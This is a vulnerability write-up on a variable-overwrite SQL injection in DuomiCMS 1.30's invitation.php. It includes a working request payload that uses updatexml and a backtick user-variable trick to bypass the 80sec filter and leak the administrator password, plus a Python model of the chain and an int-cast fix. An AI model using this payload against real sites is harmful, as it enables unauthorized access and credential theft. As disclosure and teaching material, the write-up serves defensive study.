
Variable overwrite leading to SQL injection

  1. Vulnerable page: \member\invitation.php

    if($dm=='yq')
    {
    // both values come straight from $_SESSION, which the variable-overwrite
    // bug lets a request rewrite
    $ccgid=$_SESSION['duomi_user_group'];
    $ccuid=$_SESSION['duomi_user_id'];
    // interpolated into SQL unquoted and unfiltered
    $cc1=$dsql->GetOne("select * from duomi_member_group where gid=$ccgid");
    $ccgroup=$cc1['gname'];
    $cc2=$dsql->GetOne("select * from duomi_member where id=$ccuid");
    $ccjifen=$cc2['points'];
    $ccemail=$cc2['email'];
    $cclog=$cc2['logincount'];

    $ccgid and $ccuid are passed into the query with no filtering at all, and because of the variable-overwrite issue both of them are attacker-controlled here.

    The CMS uses the generic 80sec anti-injection filter, which can be bypassed with publicly documented methods.

    Exploitation: go to the member page, register an arbitrary user (test) and log in.

    payload:
    http://127.0.0.1/duomicms_1.30/member/invitation.php
    _SESSION[duomi_user_id]=@`'` or updatexml(1, concat(0x7c, (select password from duomi_admin)), 3) and 1=@`'`&_SESSION[duomi_user_group]=1

    This extracts the administrator's password through the updatexml error message.
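The following is an added model of the chain above, written for this page and not taken from DuomiCMS: a request whose keys look like `_SESSION[...]` is registered into the global scope (the DedeCMS-style `${$_k} = $_v` loop is an assumption about how the overwrite happens), the two queries from invitation.php are built by string interpolation, and a deliberately simplified quote-stripping filter (a model, not the 80sec code) shows why the `@`'`` user-variable trick hides the `updatexml` keyword: the filter sees one empty quoted string, while MySQL sees a user variable named `'` on each side of the injected expression. `build_queries_hardened` is the obvious fix, casting both ids to int before they reach SQL.

```python
import re

# Constructed sample data: the logged-in "test" user's session and the GET
# parameters from the page's payload (the values are the page's own).
SESSION = {"duomi_user_id": "2", "duomi_user_group": "1"}

INJECTED_UID = ("@`'` or updatexml(1, concat(0x7c, "
                "(select password from duomi_admin)), 3) and 1=@`'`")

REQUEST = {
    "_SESSION[duomi_user_id]": INJECTED_UID,
    "_SESSION[duomi_user_group]": "1",
}


def register_globals(request, session):
    """Assumed variable-overwrite behaviour (not DuomiCMS source): every
    request key is written into the global scope, and a key shaped like
    name[key] lands inside the array `name`, so _SESSION[duomi_user_id]
    replaces the real session value."""
    scope = {"_SESSION": dict(session)}
    for key, value in request.items():
        m = re.fullmatch(r"(\w+)\[(\w+)\]", key)
        if m:
            scope.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            scope[key] = value
    return scope["_SESSION"]


def build_queries_vulnerable(session):
    """The two queries from invitation.php, built by interpolation."""
    ccgid = session["duomi_user_group"]
    ccuid = session["duomi_user_id"]
    return (
        f"select * from duomi_member_group where gid={ccgid}",
        f"select * from duomi_member where id={ccuid}",
    )


def strip_single_quoted(sql):
    """Simplified model (assumption) of a quote-stripping filter: text
    between pairs of single quotes is blanked before keyword checks."""
    return re.sub(r"'[^']*'", "''", sql)


def filter_flags(sql):
    """Keyword check on the quote-stripped query; True means 'blocked'."""
    return bool(re.search(r"updatexml|union.+?select",
                          strip_single_quoted(sql), re.I))


def build_queries_hardened(session):
    """Fix: cast both ids to int; anything non-numeric raises ValueError."""
    try:
        ccgid = int(session["duomi_user_group"])
        ccuid = int(session["duomi_user_id"])
    except (TypeError, ValueError):
        raise ValueError("session ids must be numeric")
    return (
        f"select * from duomi_member_group where gid={ccgid}",
        f"select * from duomi_member where id={ccuid}",
    )


def hardened_rejects(session):
    """True if the hardened builder refuses the (possibly overwritten) session."""
    try:
        build_queries_hardened(session)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    overwritten = register_globals(REQUEST, SESSION)
    _, member_query = build_queries_vulnerable(overwritten)
    print("query sent to MySQL:", member_query)
    print("what the filter checks:", strip_single_quoted(member_query))
    print("blocked by filter:", filter_flags(member_query))
    print("hardened builder rejects:", hardened_rejects(overwritten))
```

The quote-stripped view of the member query collapses to `select * from duomi_member where id=@`''``, which contains no blocked keyword, while the string actually executed still carries the full `updatexml(...)` expression; the same request against `build_queries_hardened` never reaches SQL.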
